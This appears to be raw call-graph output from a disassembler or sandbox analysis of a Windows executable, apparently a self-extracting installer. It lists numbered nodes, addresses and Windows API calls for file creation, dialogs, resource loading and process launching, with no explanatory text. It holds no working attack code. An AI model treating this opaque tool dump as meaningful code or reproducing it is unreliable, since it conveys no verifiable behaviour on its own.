23533->23535 23546 8fa24d 23533->23546 23534->23533 23538 8f8518 __onexit 21 API calls 23535->23538 23543 8fa0e4 __vsnwprintf_l 23535->23543 23536 8eec4a CatchGuardHandler 5 API calls 23537 8fa260 23536->23537 23537->23510 23538->23543 23539 8fa12d MultiByteToWideChar 23540 8fa199 23539->23540 23541 8fa146 23539->23541 23568 8fa2c0 20 API calls _free 23540->23568 23559 8fa72c 23541->23559 23543->23539 23543->23540 23546->23536 23547 8fa1a8 23551 8f8518 __onexit 21 API calls 23547->23551 23552 8fa1c9 __vsnwprintf_l 23547->23552 23548 8fa170 23548->23540 23549 8fa72c __vswprintf_c_l 11 API calls 23548->23549 23549->23540 23550 8fa23e 23567 8fa2c0 20 API calls _free 23550->23567 23551->23552 23552->23550 23553 8fa72c __vswprintf_c_l 11 API calls 23552->23553 23555 8fa21d 23553->23555 23555->23550 23556 8fa22c WideCharToMultiByte 23555->23556 23556->23550 23557 8fa26c 23556->23557 23569 8fa2c0 20 API calls _free 23557->23569 23560 8fa458 _abort 5 API calls 23559->23560 23561 8fa753 23560->23561 23563 8fa75c 23561->23563 23570 8fa7b4 10 API calls 3 library calls 23561->23570 23565 8eec4a CatchGuardHandler 5 API calls 23563->23565 23564 8fa79c LCMapStringW 23564->23563 23566 8fa15d 23565->23566 23566->23540 23566->23547 23566->23548 23567->23540 23568->23546 23569->23540 23570->23564 23572 8ee360 23571->23572 23573 8e00d9 GetModuleHandleW 23572->23573 23574 8e0154 23573->23574 23575 8e00f0 GetProcAddress 23573->23575 23576 8e0484 GetModuleFileNameW 23574->23576 23679 8f70dd 42 API calls __vsnwprintf_l 23574->23679 23577 8e0109 23575->23577 23578 8e0121 GetProcAddress 23575->23578 23591 8e04a3 23576->23591 23577->23578 23578->23574 23584 8e0133 23578->23584 23580 8e03be 23580->23576 23581 8e03c9 GetModuleFileNameW CreateFileW 23580->23581 23582 8e03fc SetFilePointer 23581->23582 23583 8e0478 CloseHandle 23581->23583 23582->23583 23585 8e040c ReadFile 23582->23585 23583->23576 23584->23574 23585->23583 23587 8e042b 23585->23587 23587->23583 23590 8e0085 2 API calls 23587->23590 23589 8e04d2 CompareStringW 23589->23591 23590->23587 23591->23589 23592 8e0508 GetFileAttributesW 23591->23592 23593 8e0520 23591->23593 23670 8dacf5 23591->23670 23673 8e0085 23591->23673 23592->23591 23592->23593 23594 8e052a 23593->23594 23596 8e0560 23593->23596 23597 8e0542 GetFileAttributesW 23594->23597 23599 8e055a 23594->23599 23595 8e066f 23619 8e9da4 GetCurrentDirectoryW 23595->23619 23596->23595 23598 8dacf5 GetVersionExW 23596->23598 23597->23594 23597->23599 23600 8e057a 23598->23600 23599->23596 23601 8e05e7 23600->23601 23602 8e0581 23600->23602 23603 8d400a _swprintf 51 API calls 23601->23603 23604 8e0085 2 API calls 23602->23604 23605 8e060f AllocConsole 23603->23605 23606 8e058b 23604->23606 23607 8e061c GetCurrentProcessId AttachConsole 23605->23607 23608 8e0667 ExitProcess 23605->23608 23609 8e0085 2 API calls 23606->23609 23683 8f35b3 23607->23683 23611 8e0595 23609->23611 23680 8dddd1 23611->23680 23612 8e063d GetStdHandle WriteConsoleW Sleep FreeConsole 23612->23608 23615 8d400a _swprintf 51 API calls 23616 8e05c3 23615->23616 23617 8dddd1 53 API calls 23616->23617 23618 8e05d2 23617->23618 23618->23608 23619->23332 23621 8e0085 2 API calls 23620->23621 23622 8ea349 OleInitialize 23621->23622 23623 8ea36c GdiplusStartup SHGetMalloc 23622->23623 23623->23334 23625 8e13d7 IsDBCSLeadByte 23624->23625 23625->23625 23626 8e13ef 23625->23626 23626->23336 23630 8ebc8e 23627->23630 23628 8ebda4 23628->23345 23628->23346 23629 8e179d CharUpperW 23629->23630 23630->23628 23630->23629 23708 8decad 80 API calls ___scrt_fastfail 23630->23708 23633 8ee360 23632->23633 23634 8ed294 SetEnvironmentVariableW 23633->23634 23636 8ed2b7 23634->23636 23635 8ed2df 23635->23339 23636->23635 23637 8ed2d3 SetEnvironmentVariableW 23636->23637 23637->23635 23639 8eae0e 23638->23639 23640 8eae15 23638->23640 23714 8e9e1c FindResourceW 23639->23714 23641 8eae2a 23640->23641 23642 8eae1b GetObjectW 23640->23642 23709 8e9d1a 23641->23709 23642->23641 23646 8eae80 23657 8dd31c 23646->23657 23647 8eae5c 23728 8e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23647->23728 23648 8e9e1c 12 API calls 23650 8eae4d 23648->23650 23650->23647 23652 8eae53 DeleteObject 23650->23652 23651 8eae64 23729 8e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23651->23729 23652->23647 23654 8eae6d 23730 8e9f5d 8 API calls ___scrt_fastfail 23654->23730 23656 8eae74 DeleteObject 23656->23646 23741 8dd341 23657->23741 23659 8dd328 23781 8dda4e GetModuleHandleW FindResourceW 23659->23781 23662 8e8835 23867 8ee24a 23662->23867 23666 8ea3cc GdiplusShutdown OleUninitialize 23665->23666 23666->23374 23668->23365 23669->23372 23671 8dad09 GetVersionExW 23670->23671 23672 8dad45 23670->23672 23671->23672 23672->23591 23674 8ee360 23673->23674 23675 8e0092 GetSystemDirectoryW 23674->23675 23676 8e00aa 23675->23676 23677 8e00c8 23675->23677 23678 8e00bb LoadLibraryW 23676->23678 23677->23591 23678->23677 23679->23580 23685 8dddff 23680->23685 23684 8f35bb 23683->23684 23684->23612 23684->23684 23691 8dd28a 23685->23691 23688 8dddfc 23688->23615 23689 8dde22 LoadStringW 23689->23688 23690 8dde39 LoadStringW 23689->23690 23690->23688 23696 8dd1c3 23691->23696 23693 8dd2a7 23694 8dd2bc 23693->23694 23704 8dd2c8 26 API calls 23693->23704 23694->23688 23694->23689 23697 8dd1de 23696->23697 23703 8dd1d7 _strncpy 23696->23703 23698 8dd202 23697->23698 23705 8e1596 WideCharToMultiByte 23697->23705 23700 8dd233 23698->23700 23706 8ddd6b 50 API calls __vsnprintf 23698->23706 23707 8f58d9 26 API calls 3 library calls 23700->23707 23703->23693 23704->23694 23705->23698 23706->23700 23707->23703 23708->23630 23731 8e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23709->23731 23711 8e9d21 23713 8e9d2d 23711->23713 23732 8e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23711->23732 23713->23646 23713->23647 23713->23648 23715 8e9e3e SizeofResource 23714->23715 23716 8e9e70 23714->23716 23715->23716 23717 8e9e52 LoadResource 23715->23717 23716->23640 23717->23716 23718 8e9e63 LockResource 23717->23718 23718->23716 23719 8e9e77 GlobalAlloc 23718->23719 23719->23716 23720 8e9e92 GlobalLock 23719->23720 23721 8e9f21 GlobalFree 23720->23721 23722 8e9ea1 __vswprintf_c_l 23720->23722 23721->23716 23723 8e9f1a GlobalUnlock 23722->23723 23733 8e9d7b GdipAlloc 23722->23733 23723->23721 23726 8e9eef GdipCreateHBITMAPFromBitmap 23727 8e9f05 23726->23727 23727->23723 23728->23651 23729->23654 23730->23656 23731->23711 23732->23713 23734 8e9d8d 23733->23734 23736 8e9d9a 23733->23736 23737 8e9b0f 23734->23737 23736->23723 23736->23726 23736->23727 23738 8e9b37 GdipCreateBitmapFromStream 23737->23738 23739 8e9b30 GdipCreateBitmapFromStreamICM 23737->23739 23740 8e9b3c 23738->23740 23739->23740 23740->23736 23742 8dd34b _wcschr __EH_prolog 23741->23742 23743 8dd37a GetModuleFileNameW 23742->23743 23744 8dd3ab 23742->23744 23745 8dd394 23743->23745 23783 8d99b0 23744->23783 23745->23744 23748 8dd407 23794 8f5a90 26 API calls 3 library calls 23748->23794 23750 8e3781 76 API calls 23752 8dd3db 23750->23752 23752->23748 23752->23750 23766 8dd627 23752->23766 23753 8dd41a 23795 8f5a90 26 API calls 3 library calls 23753->23795 23755 8dd563 23755->23766 23820 8d9d30 77 API calls 23755->23820 23759 8dd57d new 23760 8d9bf0 80 API calls 23759->23760 23759->23766 23763 8dd5a6 new 23760->23763 23762 8dd42c 23762->23755 23762->23766 23796 8d9e40 23762->23796 23811 8d9bf0 23762->23811 23819 8d9d30 77 API calls 23762->23819 23765 8dd5b2 new 23763->23765 23763->23766 23821 8e137a MultiByteToWideChar 23763->23821 23765->23766 23767 8dd72b 23765->23767 23769 8dda0a 23765->23769 23772 8dd9fa 23765->23772 23778 8e1596 WideCharToMultiByte 23765->23778 23825 8ddd6b 50 API calls __vsnprintf 23765->23825 23826 8f58d9 26 API calls 3 library calls 23765->23826 23804 8d9653 23766->23804 23822 8dce72 76 API calls 23767->23822 23827 8dce72 76 API calls 23769->23827 23770 8dd742 23773 8dd771 23770->23773 23777 8e3781 76 API calls 23770->23777 23772->23659 23823 8f5a90 26 API calls 3 library calls 23773->23823 23775 8dd78b 23824 8f5a90 26 API calls 3 library calls 23775->23824 23777->23770 23778->23765 23782 8dd32f 23781->23782 23782->23662 23784 8d99ba 23783->23784 23785 8d9a39 CreateFileW 23784->23785 23786 8d9a59 GetLastError 23785->23786 23787 8d9aaa 23785->23787 23788 8db66c 2 API calls 23786->23788 23789 8d9ae1 23787->23789 23791 8d9ac7 SetFileTime 23787->23791 23790 8d9a79 23788->23790 23789->23752 23790->23787 23792 8d9a7d CreateFileW GetLastError 23790->23792 23791->23789 23793 8d9aa1 23792->23793 23793->23787 23794->23753 23795->23762 23797 8d9e64 SetFilePointer 23796->23797 23798 8d9e53 23796->23798 23799 8d9e82 GetLastError 23797->23799 23800 8d9e9d 23797->23800 23798->23800 23828 8d6fa5 75 API calls 23798->23828 23799->23800 23802 8d9e8c 23799->23802 23800->23762 23802->23800 23829 8d6fa5 75 API calls 23802->23829 23805 8d9688 23804->23805 23806 8d9677 23804->23806 23805->23659 23806->23805 23807 8d968a 23806->23807 23808 8d9683 23806->23808 23835 8d96d0 23807->23835 23830 8d9817 23808->23830 23813 8d9bfc 23811->23813 23816 8d9c03 23811->23816 23813->23762 23814 8d9c9e 23814->23813 23862 8d6f6b 75 API calls 23814->23862 23816->23813 23816->23814 23817 8d9cc0 23816->23817 23850 8d984e 23816->23850 23817->23813 23818 8d984e 5 API calls 23817->23818 23818->23817 23819->23762 23820->23759 23821->23765 23822->23770 23823->23775 23824->23766 23825->23765 23826->23765 23827->23772 23828->23797 23829->23800 23831 8d9820 23830->23831 23834 8d9824 23830->23834 23831->23805 23834->23831 23841 8da12d 23834->23841 23836 8d96dc 23835->23836 23837 8d96fa 23835->23837 23836->23837 23839 8d96e8 FindCloseChangeNotification 23836->23839 23838 8d9719 23837->23838 23849 8d6e3e 74 API calls 23837->23849 23838->23805 23839->23837 23842 8ee360 23841->23842 23843 8da13a DeleteFileW 23842->23843 23844 8da14d 23843->23844 23845 8d984c 23843->23845 23846 8db66c 2 API calls 23844->23846 23845->23805 23847 8da161 23846->23847 23847->23845 23848 8da165 DeleteFileW 23847->23848 23848->23845 23849->23838 23851 8d985c GetStdHandle 23850->23851 23852 8d9867 ReadFile 23850->23852 23851->23852 23853 8d98a0 23852->23853 23854 8d9880 23852->23854 23853->23816 23863 8d9989 23854->23863 23856 8d9887 23857 8d9895 23856->23857 23858 8d98a8 GetLastError 23856->23858 23859 8d98b7 23856->23859 23860 8d984e GetFileType 23857->23860 23858->23853 23858->23859 23859->23853 23861 8d98c7 GetLastError 23859->23861 23860->23853 23861->23853 23861->23857 23862->23813 23864 8d998f 23863->23864 23865 8d9992 GetFileType 23863->23865 23864->23856 23866 8d99a0 23865->23866 23866->23856 23870 8ee24f new 23867->23870 23868 8e8854 23868->23359 23870->23868 23873 8f71ad 7 API calls 2 library calls 23870->23873 23874 8eecce RaiseException CallUnexpected new 23870->23874 23875 8eecb1 RaiseException Concurrency::cancel_current_task CallUnexpected 23870->23875 23873->23870 23877 8f7430 _abort 23876->23877 23878 8f7448 23877->23878 23879 8f757e _abort GetModuleHandleW 23877->23879 23898 8fa3f1 EnterCriticalSection 23878->23898 23881 8f743c 23879->23881 23881->23878 23910 8f75c2 GetModuleHandleExW 23881->23910 23882 8f74ee 23899 8f752e 23882->23899 23885 8f7450 23885->23882 23887 8f74c5 23885->23887 23918 8f7f30 20 API calls _abort 23885->23918 23890 8f74dd 23887->23890 23895 8f81f1 _abort 5 API calls 23887->23895 23888 8f750b 23902 8f753d 23888->23902 23889 8f7537 23919 901a19 5 API calls CatchGuardHandler 23889->23919 23891 8f81f1 _abort 5 API calls 23890->23891 23891->23882 23895->23890 23898->23885 23920 8fa441 LeaveCriticalSection 23899->23920 23901 8f7507 23901->23888 23901->23889 23921 8fa836 23902->23921 23905 8f756b 23908 8f75c2 _abort 8 API calls 23905->23908 23906 8f754b GetPEB 23906->23905 23907 8f755b GetCurrentProcess TerminateProcess 23906->23907 23907->23905 23909 8f7573 ExitProcess 23908->23909 23911 8f760f 23910->23911 23912 8f75ec GetProcAddress 23910->23912 23914 8f761e 23911->23914 23915 8f7615 FreeLibrary 23911->23915 23913 8f7601 23912->23913 23913->23911 23916 8eec4a CatchGuardHandler 5 API calls 23914->23916 23915->23914 23917 8f7628 23916->23917 23917->23878 23918->23887 23920->23901 23922 8fa85b 23921->23922 23923 8fa851 23921->23923 23924 8fa458 _abort 5 API calls 23922->23924 23925 8eec4a CatchGuardHandler 5 API calls 23923->23925 23924->23923 23926 8f7547 23925->23926 23926->23905 23926->23906 24770 8eacd0 100 API calls 24822 8e19d0 26 API calls std::bad_exception::bad_exception 23934 8eaee0 23935 8eaeea __EH_prolog 23934->23935 24097 8d130b 23935->24097 23938 8eaf2c 23941 8eaf39 23938->23941 23946 8eafa2 23938->23946 24002 8eaf18 23938->24002 23939 8eb5cb 24162 8ecd2e 23939->24162 23943 8eaf3e 23941->23943 23949 8eaf75 23941->23949 23954 8dddd1 53 API calls 23943->23954 23943->24002 23944 8eb5e9 SendMessageW 23945 8eb5f7 23944->23945 23951 8eb600 SendDlgItemMessageW 23945->23951 23952 8eb611 GetDlgItem SendMessageW 23945->23952 23947 8eb041 GetDlgItemTextW 23946->23947 23948 8eafbc 23946->23948 23947->23949 23950 8eb077 23947->23950 23953 8dddd1 53 API calls 23948->23953 23955 8eaf96 KiUserCallbackDispatcher 23949->23955 23949->24002 23956 8eb08f GetDlgItem 23950->23956 23957 8eb080 23950->23957 23951->23952 24180 8e9da4 GetCurrentDirectoryW 23952->24180 23961 8eafde SetDlgItemTextW 23953->23961 23962 8eaf58 23954->23962 23955->24002 23959 8eb0a4 SendMessageW SendMessageW 23956->23959 23960 8eb0c5 SetFocus 23956->23960 23957->23949 23972 8eb56b 23957->23972 23959->23960 23966 8eb0d5 23960->23966 23981 8eb0ed 23960->23981 23967 8eafec 23961->23967 24202 8d1241 SHGetMalloc 23962->24202 23963 8eb641 GetDlgItem 23964 8eb65e 23963->23964 23965 8eb664 SetWindowTextW 23963->23965 23964->23965 24181 8ea2c7 GetClassNameW 23965->24181 23970 8dddd1 53 API calls 23966->23970 23975 8eaff9 GetMessageW 23967->23975 23967->24002 23974 8eb0df 23970->23974 23971 8eaf5f 23976 8eaf63 SetDlgItemTextW 23971->23976 23971->24002 23977 8dddd1 53 API calls 23972->23977 24203 8ecb5a 23974->24203 23980 8eb010 IsDialogMessageW 23975->23980 23975->24002 23976->24002 23982 8eb57b SetDlgItemTextW 23977->23982 23980->23967 23984 8eb01f TranslateMessage DispatchMessageW 23980->23984 23986 8dddd1 53 API calls 23981->23986 23985 8eb58f 23982->23985 23984->23967 23987 8dddd1 53 API calls 23985->23987 23989 8eb124 23986->23989 23990 8eb5b8 23987->23990 23988 8eb6af 23994 8eb6df 23988->23994 23998 8dddd1 53 API calls 23988->23998 23995 8d400a _swprintf 51 API calls 23989->23995 23996 8dddd1 53 API calls 23990->23996 23991 8eb0e6 24107 8da04f 23991->24107 23993 8ebdf5 98 API calls 23993->23988 24001 8ebdf5 98 API calls 23994->24001 24046 8eb797 23994->24046 23999 8eb136 23995->23999 23996->24002 24006 8eb6c2 SetDlgItemTextW 23998->24006 24000 8ecb5a 16 API calls 23999->24000 24000->23991 24007 8eb6fa 24001->24007 24003 8eb847 24008 8eb859 24003->24008 24009 8eb850 EnableWindow 24003->24009 24004 8eb17f 24113 8ea322 SetCurrentDirectoryW 24004->24113 24005 8eb174 GetLastError 24005->24004 24011 8dddd1 53 API calls 24006->24011 24015 8eb70c 24007->24015 24039 8eb731 24007->24039 24012 8eb876 24008->24012 24221 8d12c8 GetDlgItem EnableWindow 24008->24221 24009->24008 24014 8eb6d6 SetDlgItemTextW 24011->24014 24020 8eb89d 24012->24020 24025 8eb895 SendMessageW 24012->24025 24013 8eb195 24018 8eb19e GetLastError 24013->24018 24019 8eb1ac 24013->24019 24014->23994 24219 8e9635 32 API calls 24015->24219 24016 8eb78a 24021 8ebdf5 98 API calls 24016->24021 24018->24019 24024 8eb227 24019->24024 24029 8eb1c4 GetTickCount 24019->24029 24030 8eb237 24019->24030 24020->24002 24026 8dddd1 53 API calls 24020->24026 24021->24046 24023 8eb86c 24222 8d12c8 GetDlgItem EnableWindow 24023->24222 24024->24030 24033 8eb46c 24024->24033 24025->24020 24032 8eb8b6 SetDlgItemTextW 24026->24032 24027 8eb725 24027->24039 24037 8d400a _swprintf 51 API calls 24029->24037 24035 8eb24f GetModuleFileNameW 24030->24035 24036 8eb407 24030->24036 24031 8eb825 24220 8e9635 32 API calls 24031->24220 24032->24002 24122 8d12e6 GetDlgItem ShowWindow 24033->24122 24213 8deb3a 80 API calls 24035->24213 24036->23949 24050 8dddd1 53 API calls 24036->24050 24044 8eb1dd 24037->24044 24039->24016 24041 8ebdf5 98 API calls 24039->24041 24040 8dddd1 53 API calls 24040->24046 24047 8eb75f 24041->24047 24042 8eb47c 24123 8d12e6 GetDlgItem ShowWindow 24042->24123 24114 8d971e 24044->24114 24045 8eb844 24045->24003 24046->24003 24046->24031 24046->24040 24047->24016 24051 8eb768 DialogBoxParamW 24047->24051 24049 8eb275 24053 8d400a _swprintf 51 API calls 24049->24053 24054 8eb41b 24050->24054 24051->23949 24051->24016 24052 8eb486 24055 8dddd1 53 API calls 24052->24055 24056 8eb297 CreateFileMappingW 24053->24056 24057 8d400a _swprintf 51 API calls 24054->24057 24059 8eb490 SetDlgItemTextW 24055->24059 24060 8eb2f9 GetCommandLineW 24056->24060 24091 8eb376 __vswprintf_c_l 24056->24091 24061 8eb439 24057->24061 24124 8d12e6 GetDlgItem ShowWindow 24059->24124 24065 8eb30a 24060->24065 24074 8dddd1 53 API calls 24061->24074 24062 8eb203 24066 8eb20a GetLastError 24062->24066 24067 8eb215 24062->24067 24063 8eb381 ShellExecuteExW 24088 8eb39e 24063->24088 24214 8eab2e SHGetMalloc 24065->24214 24066->24067 24070 8d9653 79 API calls 24067->24070 24068 8eb4a2 SetDlgItemTextW GetDlgItem 24071 8eb4bf GetWindowLongW SetWindowLongW 24068->24071 24072 8eb4d7 24068->24072 24070->24024 24071->24072 24125 8ebdf5 24072->24125 24073 8eb326 24215 8eab2e SHGetMalloc 24073->24215 24074->23949 24078 8eb332 24216 8eab2e SHGetMalloc 24078->24216 24079 8eb3e1 24079->24036 24085 8eb3f7 UnmapViewOfFile CloseHandle 24079->24085 24080 8ebdf5 98 API calls 24082 8eb4f3 24080->24082 24150 8ed0f5 24082->24150 24083 8eb33e 24217 8decad 80 API calls ___scrt_fastfail 24083->24217 24085->24036 24087 8eb355 MapViewOfFile 24087->24091 24088->24079 24092 8eb3cd Sleep 24088->24092 24090 8ebdf5 98 API calls 24095 8eb519 24090->24095 24091->24063 24092->24079 24092->24088 24093 8eb542 24218 8d12c8 GetDlgItem EnableWindow 24093->24218 24095->24093 24096 8ebdf5 98 API calls 24095->24096 24096->24093 24098 8d136d 24097->24098 24099 8d1314 24097->24099 24224 8dda71 GetWindowLongW SetWindowLongW 24098->24224 24100 8d137a 24099->24100 24223 8dda98 62 API calls 2 library calls 24099->24223 24100->23938 24100->23939 24100->24002 24103 8d1336 24103->24100 24104 8d1349 GetDlgItem 24103->24104 24104->24100 24105 8d1359 24104->24105 24105->24100 24106 8d135f SetWindowTextW 24105->24106 24106->24100 24110 8da059 24107->24110 24108 8da0ea 24109 8da207 9 API calls 24108->24109 24111 8da113 24108->24111 24109->24111 24110->24108 24110->24111 24225 8da207 24110->24225 24111->24004 24111->24005 24113->24013 24115 8d9728 24114->24115 24116 8d9792 CreateFileW 24115->24116 24117 8d9786 24115->24117 24116->24117 24118 8d97e4 24117->24118 24119 8db66c 2 API calls 24117->24119 24118->24062 24120 8d97cb 24119->24120 24120->24118 24121 8d97cf CreateFileW 24120->24121 24121->24118 24122->24042 24123->24052 24124->24068 24126 8ebdff __EH_prolog 24125->24126 24127 8eb4e5 24126->24127 24128 8eaa36 ExpandEnvironmentStringsW 24126->24128 24127->24080 24139 8ebe36 _wcsrchr 24128->24139 24130 8eaa36 ExpandEnvironmentStringsW 24130->24139 24131 8ec11d SetWindowTextW 24131->24139 24134 8f35de 22 API calls 24134->24139 24136 8ebf0b SetFileAttributesW 24137 8ebfc5 GetFileAttributesW 24136->24137 24149 8ebf25 ___scrt_fastfail 24136->24149 24137->24139 24141 8ebfd7 DeleteFileW 24137->24141 24139->24127 24139->24130 24139->24131 24139->24134 24139->24136 24142 8ec2e7 GetDlgItem SetWindowTextW SendMessageW 24139->24142 24145 8ec327 SendMessageW 24139->24145 24246 8e17ac CompareStringW 24139->24246 24247 8e9da4 GetCurrentDirectoryW 24139->24247 24249 8da52a 7 API calls 24139->24249 24250 8da4b3 FindClose 24139->24250 24251 8eab9a 76 API calls new 24139->24251 24141->24139 24143 8ebfe8 24141->24143 24142->24139 24144 8d400a _swprintf 51 API calls 24143->24144 24146 8ec008 GetFileAttributesW 24144->24146 24145->24139 24146->24143 24147 8ec01d MoveFileW 24146->24147 24147->24139 24148 8ec035 MoveFileExW 24147->24148 24148->24139 24149->24137 24149->24139 24248 8db4f7 52 API calls 2 library calls 24149->24248 24151 8ed0ff __EH_prolog 24150->24151 24252 8dfead 24151->24252 24153 8ed130 24256 8d5c59 24153->24256 24155 8ed14e 24260 8d7c68 24155->24260 24159 8ed1a1 24277 8d7cfb 24159->24277 24161 8eb504 24161->24090 24163 8ecd38 24162->24163 24164 8e9d1a 4 API calls 24163->24164 24165 8ecd3d 24164->24165 24166 8eb5d1 24165->24166 24167 8ecd45 GetWindow 24165->24167 24166->23944 24166->23945 24167->24166 24170 8ecd65 24167->24170 24168 8ecd72 GetClassNameW 24711 8e17ac CompareStringW 24168->24711 24170->24166 24170->24168 24171 8ecdfa GetWindow 24170->24171 24172 8ecd96 GetWindowLongW 24170->24172 24171->24166 24171->24170 24172->24171 24173 8ecda6 SendMessageW 24172->24173 24173->24171 24174 8ecdbc GetObjectW 24173->24174 24712 8e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24174->24712 24176 8ecdd3 24713 8e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24176->24713 24714 8e9f5d 8 API calls ___scrt_fastfail 24176->24714 24179 8ecde4 SendMessageW DeleteObject 24179->24171 24180->23963 24182 8ea30d 24181->24182 24183 8ea2e8 24181->24183 24185 8ea31b 24182->24185 24186 8ea312 SHAutoComplete 24182->24186 24715 8e17ac CompareStringW 24183->24715 24189 8ea7c3 24185->24189 24186->24185 24187 8ea2fb 24187->24182 24188 8ea2ff FindWindowExW 24187->24188 24188->24182 24190 8ea7cd __EH_prolog 24189->24190 24191 8d1380 82 API calls 24190->24191 24192 8ea7ef 24191->24192 24716 8d1f4f 24192->24716 24195 8ea818 24198 8d1951 126 API calls 24195->24198 24196 8ea809 24197 8d1631 84 API calls 24196->24197 24199 8ea814 24197->24199 24201 8ea83a __vswprintf_c_l new 24198->24201 24199->23988 24199->23993 24200 8d1631 84 API calls 24200->24199 24201->24199 24201->24200 24202->23971 24724 8eac74 PeekMessageW 24203->24724 24206 8ecbbc SendMessageW SendMessageW 24208 8ecbf8 24206->24208 24209 8ecc17 SendMessageW SendMessageW SendMessageW 24206->24209 24207 8ecb88 24210 8ecb93 ShowWindow SendMessageW SendMessageW 24207->24210 24208->24209 24211 8ecc6d SendMessageW 24209->24211 24212 8ecc4a SendMessageW 24209->24212 24210->24206 24211->23991 24212->24211 24213->24049 24214->24073 24215->24078 24216->24083 24217->24087 24218->23957 24219->24027 24220->24045 24221->24023 24222->24012 24223->24103 24224->24100 24226 8da214 24225->24226 24227 8da238 24226->24227 24229 8da22b CreateDirectoryW 24226->24229 24228 8da180 4 API calls 24227->24228 24231 8da23e 24228->24231 24229->24227 24230 8da26b 24229->24230 24235 8da27a 24230->24235 24238 8da444 24230->24238 24232 8da27e GetLastError 24231->24232 24233 8db66c 2 API calls 24231->24233 24232->24235 24236 8da254 24233->24236 24235->24110 24236->24232 24237 8da258 CreateDirectoryW 24236->24237 24237->24230 24237->24232 24239 8ee360 24238->24239 24240 8da451 SetFileAttributesW 24239->24240 24241 8da494 24240->24241 24242 8da467 24240->24242 24241->24235 24243 8db66c 2 API calls 24242->24243 24244 8da47b 24243->24244 24244->24241 24245 8da47f SetFileAttributesW 24244->24245 24245->24241 24246->24139 24247->24139 24248->24149 24249->24139 24250->24139 24251->24139 24253 8dfeba 24252->24253 24281 8d1789 24253->24281 24255 8dfed2 24255->24153 24257 8dfead 24256->24257 24258 8d1789 76 API calls 24257->24258 24259 8dfed2 24258->24259 24259->24155 24261 8d7c72 __EH_prolog 24260->24261 24298 8dc827 24261->24298 24263 8d7c8d 24264 8ee24a new 8 API calls 24263->24264 24265 8d7cb7 24264->24265 24304 8e440b 24265->24304 24268 8d7ddf 24269 8d7de9 24268->24269 24271 8d7e53 24269->24271 24333 8da4c6 24269->24333 24272 8d7ec4 24271->24272 24275 8da4c6 8 API calls 24271->24275 24311 8d837f 24271->24311 24276 8d7f06 24272->24276 24339 8d6dc1 74 API calls 24272->24339 24275->24271 24276->24159 24278 8d7d09 24277->24278 24280 8d7d10 24277->24280 24279 8e1acf 84 API calls 24278->24279 24279->24280 24282 8d179f 24281->24282 24293 8d17fa __vswprintf_c_l 24281->24293 24283 8d17c8 24282->24283 24294 8d6e91 74 API calls __vswprintf_c_l 24282->24294 24284 8d1827 24283->24284 24289 8d17e7 new 24283->24289 24286 8f35de 22 API calls 24284->24286 24288 8d182e 24286->24288 24287 8d17be 24295 8d6efd 75 API calls 24287->24295 24288->24293 24297 8d6efd 75 API calls 24288->24297 24289->24293 24296 8d6efd 75 API calls 24289->24296 24293->24255 24294->24287 24295->24283 24296->24293 24297->24293 24299 8dc831 __EH_prolog 24298->24299 24300 8ee24a new 8 API calls 24299->24300 24301 8dc874 24300->24301 24302 8ee24a new 8 API calls 24301->24302 24303 8dc898 24302->24303 24303->24263 24305 8e4415 __EH_prolog 24304->24305 24306 8ee24a new 8 API calls 24305->24306 24307 8e4431 24306->24307 24308 8d7ce6 24307->24308 24310 8e06ba 78 API calls 24307->24310 24308->24268 24310->24308 24312 8d8389 __EH_prolog 24311->24312 24340 8d1380 24312->24340 24314 8d83a4 24348 8d9ef7 24314->24348 24320 8d83d3 24468 8d1631 24320->24468 24321 8d846e 24367 8d8517 24321->24367 24324 8d84ce 24371 8d1f00 24324->24371 24328 8d83cf 24328->24320 24328->24321 24331 8da4c6 8 API calls 24328->24331 24472 8dbac4 CompareStringW 24328->24472 24329 8d84d9 24329->24320 24375 8d3aac 24329->24375 24385 8d857b 24329->24385 24331->24328 24334 8da4db 24333->24334 24335 8da4df 24334->24335 24699 8da5f4 24334->24699 24335->24269 24337 8da4ef 24337->24335 24338 8da4f4 FindClose 24337->24338 24338->24335 24339->24276 24341 8d1385 __EH_prolog 24340->24341 24342 8dc827 8 API calls 24341->24342 24343 8d13bd 24342->24343 24344 8ee24a new 8 API calls 24343->24344 24347 8d1416 ___scrt_fastfail 24343->24347 24345 8d1403 24344->24345 24346 8db07d 82 API calls 24345->24346 24345->24347 24346->24347 24347->24314 24349 8d9f0e 24348->24349 24350 8d83ba 24349->24350 24474 8d6f5d 76 API calls 24349->24474 24350->24320 24352 8d19a6 24350->24352 24353 8d19b0 __EH_prolog 24352->24353 24363 8d1a00 24353->24363 24366 8d19e5 24353->24366 24475 8d709d 24353->24475 24355 8d1b50 24478 8d6dc1 74 API calls 24355->24478 24357 8d3aac 97 API calls 24361 8d1bb3 24357->24361 24358 8d1b60 24358->24357 24358->24366 24359 8d1bff 24365 8d1c32 24359->24365 24359->24366 24479 8d6dc1 74 API calls 24359->24479 24361->24359 24362 8d3aac 97 API calls 24361->24362 24362->24361 24363->24355 24363->24358 24363->24366 24364 8d3aac 97 API calls 24364->24365 24365->24364 24365->24366 24366->24328 24368 8d8524 24367->24368 24497 8e0c26 GetSystemTime SystemTimeToFileTime 24368->24497 24370 8d8488 24370->24324 24473 8e1359 72 API calls 24370->24473 24372 8d1f05 __EH_prolog 24371->24372 24373 8d1f39 24372->24373 24499 8d1951 24372->24499 24373->24329 24376 8d3abc 24375->24376 24377 8d3ab8 24375->24377 24378 8d3af7 24376->24378 24380 8d3ae9 24376->24380 24377->24329 24634 8d27e8 97 API calls 3 library calls 24378->24634 24379 8d3b29 24379->24329 24380->24379 24633 8d3281 85 API calls 3 library calls 24380->24633 24383 8d3af5 24383->24379 24635 8d204e 74 API calls 24383->24635 24386 8d8585 __EH_prolog 24385->24386 24387 8d85be 24386->24387 24403 8d85c2 24386->24403 24658 8e84bd 99 API calls 24386->24658 24388 8d85e7 24387->24388 24393 8d867a 24387->24393 24387->24403 24390 8d8609 24388->24390 24388->24403 24659 8d7b66 151 API calls 24388->24659 24390->24403 24660 8e84bd 99 API calls 24390->24660 24393->24403 24636 8d5e3a 24393->24636 24395 8d8705 24395->24403 24642 8d826a 24395->24642 24398 8d8875 24399 8da4c6 8 API calls 24398->24399 24401 8d88e0 24398->24401 24399->24401 